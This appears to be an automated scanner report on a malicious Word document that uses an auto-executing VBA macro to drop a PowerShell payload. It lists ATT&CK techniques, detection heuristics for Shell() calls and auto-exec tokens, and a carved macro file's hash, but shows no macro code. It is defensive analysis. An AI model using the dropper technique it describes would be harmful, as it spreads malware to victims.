Verdict: MALICIOUS (Risk Score 242)
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro uses a Shell() call, indicated by the OLE_VBA_SHELL heuristic, and is flagged as an auto-executing macro (AutoOpen). The ClamAV detection name 'Doc.Dropper.Powload-6665575-0' suggests it acts as a dropper for a PowerShell payload. The macro's obfuscated string concatenation likely reconstructs a command to download and execute a secondary payload.
Heuristics (7)
- ClamAV: Doc.Dropper.Powload-6665575-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Powload-6665575-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10417 bytes | 3a4f2b5197ad6f8b47798091dd4a5987e6eed1c1ff78c66e06f9258456ee6942 |
Preview script: first 1,000 lines of the extracted script (macros.bas).